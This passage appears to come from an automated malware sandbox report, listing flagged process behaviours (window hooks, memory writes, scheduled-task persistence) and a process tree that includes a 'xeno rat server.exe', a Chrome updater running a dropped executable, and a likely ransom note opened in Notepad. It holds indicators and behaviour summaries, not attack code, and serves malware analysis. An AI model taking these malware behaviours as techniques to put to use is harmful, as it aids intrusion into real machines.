4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
4364	chrome.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe
7000	taskmgr.exe

Suspicious use of SetWindowsHookEx 41 IoCs

Processes:

Update.exeExplorer.EXEConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exexeno rat server.exeConhost.exeConhost.exeConhost.exe

pid	process
5680	Update.exe
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
2940	Conhost.exe
8276	Conhost.exe
3460	Explorer.EXE
3460	Explorer.EXE
10060	Conhost.exe
10980	Conhost.exe
3460	Explorer.EXE
3460	Explorer.EXE
11588	Conhost.exe
3816	Conhost.exe
11652	Conhost.exe
12200	Conhost.exe
5768	Conhost.exe
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
1952	xeno rat server.exe
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
3460	Explorer.EXE
4560	Conhost.exe
6716	Conhost.exe
6736	Conhost.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

RuntimeBroker.exeExplorer.EXE

pid process

4456 RuntimeBroker.exe
3460 Explorer.EXE

pid	process
4456	RuntimeBroker.exe
3460	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4364 wrote to memory of 3712	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3712	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 3628	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 1580	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 1580	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe
PID 4364 wrote to memory of 4288	4364	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1212
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2820
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3296
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1512
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x2f4 0x2fc
  2⤵
  PID:2064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2080

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2808

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2876

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3116

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3460
- C:\Windows\system32\NOTEPAD.EXE
  C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\meow.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd3c33ab58,0x7ffd3c33ab68,0x7ffd3c33ab78
    3⤵
    PID:3712
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:2
    3⤵
    PID:3628
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:1580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:4288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:1676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:1460
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4356 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:4616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:1068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:3988
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4768 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:3616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3112 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:4752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3484 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:3492
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4612 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3216 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:3176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3600 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:1676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4684 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:3052
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:412
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4720 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:2940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5132 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:2108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:400
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4944 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:2380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4880 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:1976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4360 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5148
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5400 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5156
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5652 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5164
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5796 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5172
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5800 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5200
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6084 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5208
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6212 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6368 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6380 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6556 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5260
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6572 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5268
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6580 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5276
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6596 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6752 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5292
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6884 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6900 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5312
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=6912 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:5320
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=7876 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7972 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8308 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6736
- - C:\Program Files\Google\Chrome\Application\chrome.exe
